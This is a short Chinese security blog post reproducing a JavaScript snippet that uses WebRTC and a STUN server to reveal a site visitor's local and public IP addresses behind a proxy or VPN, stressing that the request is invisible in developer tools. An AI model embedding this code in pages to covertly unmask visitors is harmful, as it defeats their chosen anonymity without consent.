绕过代理获取访客真实IP

CracerCracer 2015-12-31 安全工具 1,233 0 4

 

Firefox 跟 Chrome支持WebRTC可以向STUN服务器请求,返回内外网IP,不同于XMLHttpRequest请求,STUN请求开发者工具当中看不到网络请求的。

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
//get the IP addresses associated with an account
function getIPs(callback){
var ip_dups = {};

//compatibility for firefox and chrome
var RTCPeerConnection = window.RTCPeerConnection
|| window.mozRTCPeerConnection
|| window.webkitRTCPeerConnection;
var mediaConstraints = {
optional: [{RtpDataChannels: true}]
};

//firefox already has a default stun server in about:config
// media.peerconnection.default_iceservers =
// [{"url": "stun:stun.services.mozilla.com"}]
var servers = undefined;

//add same stun server for chrome
if(window.webkitRTCPeerConnection)
servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};

//construct a new RTCPeerConnection
var pc = new RTCPeerConnection(servers, mediaConstraints);

//listen for candidate events
pc.onicecandidate = function(ice){

//skip non-candidate events
if(ice.candidate){

//match just the IP address
var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/
var ip_addr = ip_regex.exec(ice.candidate.candidate)[1];

//remove duplicates
if(ip_dups[ip_addr] === undefined)
callback(ip_addr);

ip_dups[ip_addr] = true;
}
};

//create a bogus data channel
pc.createDataChannel("");

//create an offer sdp
pc.createOffer(function(result){

//trigger the stun server request
pc.setLocalDescription(result, function(){});

}, function(){});
}

//Test: Print the IP addresses into the console
getIPs(function(ip){console.log(ip);});

 

本地测试了一下,挂上VPN的效果……

2015012711010318783

 

from:https://github.com/diafygi/webrtc-ips

转载请注明来自Cracer,本文标题:《绕过代理获取访客真实IP》

喜欢 (4) 发布评论
发表评论


Top